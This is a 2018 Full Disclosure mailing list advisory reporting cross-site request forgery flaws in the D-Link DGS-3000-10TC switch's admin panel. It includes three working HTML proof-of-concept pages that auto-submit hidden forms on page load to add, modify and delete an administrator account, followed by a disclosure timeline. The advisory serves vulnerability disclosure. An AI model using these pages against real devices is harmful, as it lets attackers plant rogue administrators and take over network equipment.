
Date: Wed, 28 Feb 2018 23:53:41 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] CSRF vulnerabilities in D-Link DGS-3000-10TC

Hello list!

There are Cross-Site Request Forgery vulnerabilities in D-Link 
DGS-3000-10TC. In previous advisory I wrote about Cross-Site Scripting and 
Content Spoofing vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DGS-3000-10TC, Firmware Version 
2.00.006. All other versions also must be vulnerable.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Admin panel has CSRF vulnerabilities in all functionality. E.g. in this 
functionality.

Add new admin:

D-Link DGS-3000-10TC CSRF-1.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm" 
method="post">
<input type="hidden" name="h_flag" value="0">
<input type="hidden" name="T1" value="hacker">
<input type="hidden" name="T5" value="password">
<input type="hidden" name="operation" value="add">
<input type="hidden" name="S2" value="Admin">
<input type="hidden" name="T6" value="password">
</form>
</body>
</html>

Change password in new admin:

D-Link DGS-3000-10TC CSRF-2.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm" 
method="post">
<input type="hidden" name="username" value="hacker">
<input type="hidden" name="acc_right" value="Admin">
<input type="hidden" name="h_flag" value="0">
<input type="hidden" name="operation" value="modify">
<input type="hidden" name="password" value="password">
<input type="hidden" name="new_password" value="password1">
<input type="hidden" name="confirm_password" value="password1">
</form>
</body>
</html>

Delete new admin:

D-Link DGS-3000-10TC CSRF-3.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm" 
method="post">
<input type="hidden" name="T1" value="hacker">
<input type="hidden" name="operation" value="del">
</form>
</body>
</html>

------------
Timeline:
------------

2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.08.28 - informed about it one USA company with bug bounty program -
they were interested in this device, but not in these vulnerabilities. Later
informed D-Link about them.
2017.10.28 - disclosed at my site (http://websecurity.com.ua/8720/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
